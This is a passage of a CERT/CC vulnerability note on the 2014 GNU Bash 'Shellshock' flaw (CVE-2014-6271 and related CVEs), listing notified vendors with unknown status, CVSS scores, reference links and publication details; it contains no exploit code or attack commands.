Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ CA Technologies\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Cray Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ DragonFly BSD Project\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ EMC Corporation\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Engarde Secure Linux\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Enterasys Networks\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Ericsson\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Force10 Networks, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Foundry Networks, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Fujitsu\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Google\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Hitachi\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM Corporation (zseries)\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM eServer\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Infoblox\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Intel Corporation\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Intoto\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Mandriva S. A.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ MontaVista Software, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Mozilla\n\nNotified: October 27, 2014 Updated: October 27, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Nokia\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ OpenBSD\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Openwall GNU/*/Linux\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Peplink\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Q1 Labs\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ QNX Software Systems Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Quagga\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SafeNet\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SmoothWall\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Snort\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sony Corporation\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sourcefire\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Spyrus\n\nNotified: November 19, 2014 Updated: November 19, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Stonesoft\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Symantec\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ The SCO Group\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ TippingPoint Technologies Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Turbolinux\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Unisys\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Vyatta\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Watchguard Technologies, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Wind River Systems, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ ZyXEL\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ eSoft, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ m0n0wall\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ netfilter\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 93 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.6 | CDP:LM/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://seclists.org/oss-sec/2014/q3/650>\n * <https://access.redhat.com/articles/1200223>\n * <https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/>\n * <http://seclists.org/oss-sec/2014/q3/688>\n * <http://seclists.org/oss-sec/2014/q3/685>\n * <http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html>\n * <http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html>\n * <https://gist.github.com/anonymous/929d622f3b36b00c0be1>\n * <https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html>\n * <https://shellshocker.net/#>\n\n### Acknowledgements\n\nThis document was written by Chris King.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-6271, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>) [CVE-2014-7169, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>) [CVE-2014-6277, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277>) [CVE-2014-7186, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186>) [CVE-2014-7187](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187>) \n---|--- \n**Date Public:** | 2014-09-24 \n**Date First Published:** | 2014-09-25 \n**Date Last Updated: ** | 2015-04-14 20:35 UTC \n**Document Revision: ** | 55 \n", "modified": "2015-04-14T20:35:00", "published": "2014-09-25T00:00:00", "id": "VU:252743", "href": "https://www.kb.cert.org/vuls/id/252743", "type": "cert", "title": "GNU Bash shell executes commands in exported functions in environment variables", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
